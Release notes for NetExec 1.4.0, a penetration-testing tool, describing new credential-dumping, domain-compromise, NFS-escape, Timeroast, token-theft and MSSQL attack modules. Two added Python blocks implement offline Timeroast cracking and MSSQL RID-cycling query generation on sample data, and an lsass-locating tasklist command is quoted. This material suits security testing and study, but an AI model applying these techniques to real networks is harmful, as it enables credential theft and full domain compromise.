🧈 v1.4.0 - SmoothOperator

Hello everyone!

It has been almost half a year since the last release and a lot of new features have been added since then. Besides the most dominant protocol, SMB, other protocols like NFS, LDAP, and MSSQL have seen some love with new modules and improvements.

Thank you to everyone who contributed over the past months, and of course, a big thank you to everyone who has been reporting issues on GitHub and helping to troubleshoot or taking part in discussions on Discord. If you want to join our Discord, follow the link.

In case you didn't know, this wiki is open source too and you can contribute to it. If you would like to add missing content or improve existing content, please feel free to do so. Any help is much appreciated! You can find the wiki's source code on GitHub here.

Backup Operator to Domain Admin

As the name suggests, the new module -M backup_operator leverages the privileges of the Backup Operators group (SeBackupPrivilege) to dump the SAM and SECURITY hives of a domain controller. Since those hives hold the secrets needed to go after the NTDS.dit, this ultimately leads to a full compromise of the domain. Huge thanks to @mpgn for this module.

Backup Operator to full domain compromise

Certificate Authentication

NetExec now also supports certificate authentication, thanks to the integration of @dirkjanm's PKINITtools authentication mechanisms into NetExec, by @mpgn.

--pfx-cert/--pfx-base64 with --pfx-pass for PFX certificates
--pem-cert with --pem-key for PEM certificates
Certificate authentication using a pfx certificate
Certificate authentication using a crt and key certificate

NFS Escape to Root File System

Recent research has shown that the default NFS configuration on Linux systems is often insecure. In short: with the default no_subtree_check export option, the NFS server does not verify that a requested file handle actually lies inside the exported directory. A user with access to the share can therefore craft file handles that reach any file on the underlying file system. Combined with write access, this can lead to a full compromise of the system.

The details of the attack can be found on our wiki page here or on the great blog post by the guys from HvS Consulting.

An implementation of the attack is now available in NetExec, and a vulnerable host is indicated by a new flag in the host banner. The implementation was done by @NeffIsBack.

Note: With this update, the semantics of the file download and upload flags have been changed. Don't forget to check the new flag usage.

Example of owning a Debian host with read/write privileges and no_root_squash enabled (the latter is not strictly required)

Dumping SAM and LSA

One of NetExec's most prominent features is dumping the local account database (SAM) and the SECURITY registry hive (LSA secrets). Previously, Impacket achieved this by saving the SAM and SECURITY hives to a temporary file on the target's disk, downloading it and deleting it afterwards. This has now changed: @laxaa has implemented a method that reads the secrets directly out of the registry over the Remote Registry service, without ever writing a hive file to disk, and contributed it to Impacket. Thanks to @mpgn's integration, this method is now the default in NetExec and should offer much greater stealth. If you need the old method for some reason, you can still switch back with --sam secdump / --lsa secdump.

Timeroasting the Domain

The Timeroast attack has been added as a module to NetExec. It abuses the MS-SNTP extension of the domain controller's time service: an attacker on the network can request, without any authentication, an NTP response whose MD5 checksum is keyed with the NT hash of any computer account in the domain. That checksum is effectively a salted hash of the computer account password and can be cracked offline. If you would like to know more about the attack, check out this article from @SecuraBV. Module by @Disgame_.

Timeroast attack to retrieve hashed and salted computer NT hashes
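To make the "hashed and salted" wording concrete, here is an added example (not code from NetExec or the Timeroast module) of how the checksum in an MS-SNTP reply is built and checked. It follows the MS-SNTP construction, MD5 over the NT hash followed by the 48-byte NTP header, and emits the $sntp-ms$ line that hashcat mode 31300 consumes. The NT hash, RID and NTP header are constructed sample values, and the key-identifier layout (RID in the low bits, flags ignored) is a simplification of the real protocol.

```python
import hashlib
import struct

# Constructed sample data, not captured from a real domain controller.
# A real NT hash is MD4(UTF-16LE(password)); here it is simply a fixed 16-byte value.
SAMPLE_NT_HASH = bytes.fromhex("a4f49c406510bdcab6824ee7c30fd852")
SAMPLE_RID = 1105                                   # RID of a fictional computer account
SAMPLE_HEADER = bytes([0x1C, 0x02, 0x0A, 0xE9]) + bytes(44)  # 48-byte NTP header (server reply, version 3)


def build_ms_sntp_response(nt_hash: bytes, rid: int, header: bytes) -> bytes:
    """Assemble a 68-byte authenticated MS-SNTP reply the way a DC does:
    48-byte NTP header, 4-byte key identifier carrying the RID, then
    MD5(nt_hash || header) as the checksum."""
    if len(header) != 48 or len(nt_hash) != 16:
        raise ValueError("header must be 48 bytes and the NT hash 16 bytes")
    key_id = struct.pack("<I", rid)  # simplification: real replies may set flag bits here
    mac = hashlib.md5(nt_hash + header).digest()
    return header + key_id + mac


def rid_from_response(response: bytes) -> int:
    """Recover the RID from the key identifier field (top bit masked off)."""
    return struct.unpack("<I", response[48:52])[0] & 0x7FFFFFFF


def to_hashcat_31300(response: bytes) -> str:
    """Convert a captured reply into the hashcat 31300 format:
    $sntp-ms$<md5 of the checksum>$<48-byte header as the salt>."""
    if len(response) != 68:
        raise ValueError("an authenticated MS-SNTP reply is 68 bytes")
    header, mac = response[:48], response[52:68]
    return f"$sntp-ms${mac.hex()}${header.hex()}"


def check_nt_hash(line: str, candidate: bytes) -> bool:
    """Verify one candidate NT hash against a $sntp-ms$ line, exactly what a
    cracker does per guess: MD5(candidate || salt) must equal the stored MAC."""
    _, tag, mac_hex, salt_hex = line.split("$")
    if tag != "sntp-ms":
        raise ValueError("not a $sntp-ms$ line")
    return hashlib.md5(candidate + bytes.fromhex(salt_hex)).hexdigest() == mac_hex


def crack_nt_hash(line: str, candidates):
    """Return the first candidate NT hash that reproduces the checksum, or None."""
    for candidate in candidates:
        if check_nt_hash(line, candidate):
            return candidate
    return None


if __name__ == "__main__":
    reply = build_ms_sntp_response(SAMPLE_NT_HASH, SAMPLE_RID, SAMPLE_HEADER)
    line = to_hashcat_31300(reply)
    print(f"{rid_from_response(reply)}:{line}")
    found = crack_nt_hash(line, [bytes(16), SAMPLE_NT_HASH])
    print("recovered NT hash:", found.hex() if found else None)
```

The salt is public (it is just the NTP header the DC sent back), which is why the checksum can be attacked offline and why weak computer account passwords, for example on pre-created or legacy computer accounts, are the realistic target here.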

QWINSTA

The --loggedon-users flag is very useful when you don't have administrative privileges yet, but once you control a host it is just as useful to know where its users are connecting from. Thanks to @Defte, NetExec now uses Impacket's native implementation of the Terminal Services RPC interface (the same one qwinsta.exe speaks) to enumerate RDP sessions on the target, providing information such as the connecting IP address and the session state.

Using qwinsta to enumerate active RDP sessions on the host

Tasklist

One of the best ways to trigger an EDR is to run the command -x 'tasklist /v /fo csv | findstr /i "lsass"'. Listing processes is nevertheless very useful, for example to find out which PID lsass.exe has or which services are running under which privileges. Thanks to @Defte, NetExec now has a native implementation of tasklist that queries this information over the Terminal Services RPC interface instead of spawning a process on the target, which makes it less likely to be flagged by EDRs.

Query the tasklist over a native Windows protocol

SMB Share Listing Option

You can now list the directories of SMB shares with the new --dir SMB flag! Created by @y0no.

Take a look into shares with the new --dir flag

NFS Share Listing Option

The NFS protocol now has a built-in share listing option as well. If no share is specified, it will try the escape-to-root-file-system technique described above and list the root of the file system. Made by @NeffIsBack.

Listing directories with NFS and if possible the root file system

WAM Module

On the hunt for Entra ID or M365 access tokens? The new wam module by @zblurx dumps these tokens from the local Token Broker Cache of the Web Account Manager (WAM). You can find a great article by @xpn here if you want to learn more.

Enumerate Delegation Configurations in the Domain

It is now easier to enumerate misconfigured delegation privileges, thanks to the integration of Impacket's findDelegation.py tool by @termanix. With the new LDAP flag --find-delegation, every delegation configured in the domain (unconstrained, constrained and resource-based constrained) can be found, including information about the user/computer object and the delegation details.

Enumerate delegation configurations in the domain

LDAPS Channel Binding now Supported

LDAP Channel Binding is now supported in Impacket, which means environments that enforce channel binding on LDAPS are not a problem anymore. The LDAP protocol automatically picks up the required security options and works out of the box without user interaction. Thanks to @NeffIsBack, who took care of the Pull Request in Impacket.

Native LDAP Channel Binding support

RID Brute Force on MSSQL

You probably know the --rid-brute feature of the SMB protocol, but did you know that the same enumeration is possible over MSSQL as well? SQL Server resolves domain SIDs to account names for any authenticated login, so domain users and groups can be enumerated RID by RID. Now you can do it with NetExec, thanks to the work of @Adamkadaban!

Enumerate Domain Users and Groups with MSSQL
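As an added illustration of the underlying technique (this is not NetExec's code), the block below shows the two steps RID cycling over MSSQL relies on: take a known domain SID as SQL Server returns it from SUSER_SID(), strip the trailing RID to obtain the domain prefix, then build binary SIDs for candidate RIDs and ask SUSER_SNAME() to resolve them. The domain SID is a constructed sample value; the hypothetical helper names are mine.

```python
import struct

# T-SQL to fetch the starting point on a real server (Domain Admins always exists and has RID 512).
DOMAIN_ADMINS_QUERY = "SELECT SUSER_SID('CORP\\Domain Admins')"  # 'CORP' is a placeholder domain

# Constructed binary SID as SUSER_SID() would return it:
# revision 1, 5 sub-authorities, identifier authority 5, then 21-<3 x 32-bit>, then RID 512.
SAMPLE_DOMAIN_ADMINS_SID = bytes.fromhex(
    "0105000000000005"  # revision=1, count=5, authority=SECURITY_NT_AUTHORITY (5)
    "15000000"          # sub-authority 21
    "11111111" "22222222" "33333333"  # constructed domain identifier
    "00020000"          # RID 512 (little-endian)
)


def sid_to_string(sid: bytes) -> str:
    """Render a binary SID as the familiar S-1-5-21-... string."""
    revision, count = sid[0], sid[1]
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack("<%dI" % count, sid[8:8 + 4 * count])
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def domain_sid_prefix(account_sid: bytes) -> bytes:
    """Drop the last sub-authority (the RID) and decrement the count byte."""
    count = account_sid[1]
    if count < 2:
        raise ValueError("SID has no RID to strip")
    return bytes([account_sid[0], count - 1]) + account_sid[2:8 + 4 * (count - 1)]


def sid_for_rid(domain_prefix: bytes, rid: int) -> bytes:
    """Append a RID to the domain prefix, producing the SID of a domain principal."""
    count = domain_prefix[1]
    return bytes([domain_prefix[0], count + 1]) + domain_prefix[2:] + struct.pack("<I", rid)


def suser_sname_query(domain_prefix: bytes, rids) -> str:
    """Resolve many RIDs in one round trip: SUSER_SNAME() returns NULL for RIDs
    that do not exist, and DOMAIN\\name for users, groups and computers that do."""
    selects = [
        "SELECT %d AS rid, SUSER_SNAME(0x%s) AS name"
        % (rid, sid_for_rid(domain_prefix, rid).hex().upper())
        for rid in rids
    ]
    return " UNION ALL ".join(selects)


if __name__ == "__main__":
    print("domain admins :", sid_to_string(SAMPLE_DOMAIN_ADMINS_SID))
    prefix = domain_sid_prefix(SAMPLE_DOMAIN_ADMINS_SID)
    print("domain prefix :", sid_to_string(prefix))
    print("RID 500 SID   :", sid_to_string(sid_for_rid(prefix, 500)))
    print(suser_sname_query(prefix, range(500, 503)))
```

Batching RIDs with UNION ALL keeps the number of queries low; a real run cycles through the well-known RIDs (500, 501, 512, 513, ...) and then the 1000+ range where user, group and computer objects live. Every row whose name is not NULL is a valid domain principal, obtained with nothing more than a SQL login.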

Coercing with MSSQL

Coercing connections with SMB is a well-known technique that can be achieved by using the coerce_plus module in NetExec. However, it is now also possible to coerce connections using MSSQL and the new mssql_coerce module by @lodos!

Coercing SMB authentications with the MSSQL protocol

Shadow RDP Module

The new shadowrdp module allows you to enable or disable RDP session shadowing, which can be used to silently view a specific user's RDP session. Module by @Dfte.

Enable or disable shadow RDP on the target host

Notepad++ Module

Finding credentials in text files never happens, right? Right??

Well, even typing sensitive content into unsaved Notepad++ documents can be dangerous, as the editor keeps a backup of unsaved tabs on disk. With the new notepad++ module by @Dfte you can automatically dump this information 🚀

Dumping unsaved notepad++ documents

New Modules on MSSQL

@deathflamingo added six new modules for the MSSQL protocol! That includes a few enumeration modules, as well as modules to perform actions on linked servers:

  • enum_impersonate: List users that can be impersonated (similar to the mssql_priv module)

  • enum_logins: Enumerate active MSSQL logins

  • enum_links: Enumerate linked MSSQL servers

  • exec_on_link: Execute SQL queries on a linked server

  • link_enable_cmdshell: Enable/Disable the cmd shell on a linked server

  • link_xpcmd: Execute shell commands on the linked server

A bunch of new modules for the MSSQL protocol

Enumerate Recently Accessed Files

By default, Windows creates LNK files for recently accessed objects and stores them in the user's AppData\Roaming\Microsoft\Windows\Recent directory. This module retrieves and parses these LNK files in order to extract the paths of the source files, which is useful during internal assessments for finding recently modified and potentially juicy files. Module by @Defte.

Enumerate recently accessed files

Snipping Tool Module

Admins, think twice before taking screenshots of sensitive data! With the new snipped module you can automatically dump all screenshots done by the Windows Snipping Tool. Module by @Yeeb1.

Automatically download all screenshots from the target host

Uploading and Downloading files with SSH

The SSH protocol now also has --get-file and --put-file flags, to enable the easy upload and download of files with an authenticated session. Made by @jdholtz.

Upload and Download files via SSH

Remote UAC

This module enables you to disable, or more realistically re-enable, remote UAC (the LocalAccountTokenFilterPolicy registry value). This is useful after manual exploitation, for example to restore the system's original security posture (never leave a system more vulnerable than you found it!). Module by @Defte.

Enabling the remote UAC of the target system

Detect drop-the-MIC

The drop-the-MIC attack has been known for quite some time, but it is still really powerful if you find an unpatched host. Relaying SMB traffic to LDAP? No problem!

With the new module remove-mic made by @XiaoliChan you can easily check whether the target is vulnerable to CVE-2019-1040, aka drop the MIC 🔥

Check for CVE-2019-1040 aka drop-the-MIC

DPAPI Hash

Interested in dumping DPAPI hashes? This module, dpapi_hash, extracts DPAPI 'hashes' based on the user's protected master key, which can then be brute-forced with Hashcat (modes 15310 or 15900). Module by @nikaiw.

Dump the DPAPI hashes of users' master keys

Automatically Generate Hosts File

NetExec can now write a hosts file for the machines enumerated over SMB with --generate-hosts-file <filename>, making it easier to add entries to (and later remove them from) /etc/hosts, in CTFs as well as in real life. Made by @mpgn.

Generate the /etc/hosts file with hosts discovered over SMB

Automatically Generate KRB5 File

The new SMB flag --generate-krb5-file <filename> generates a valid krb5.conf file, similar to --generate-hosts-file, to enable Kerberos authentication with other tools. Made by @mpgn.

Generate a Kerberos config file from hosts discovered over SMB

Outro

If you want to read about all changes in detail or download the latest standalone binaries check out the GitHub release page:

Notes by Alexand @termanix, copyedit by Marshall Hallenbeck
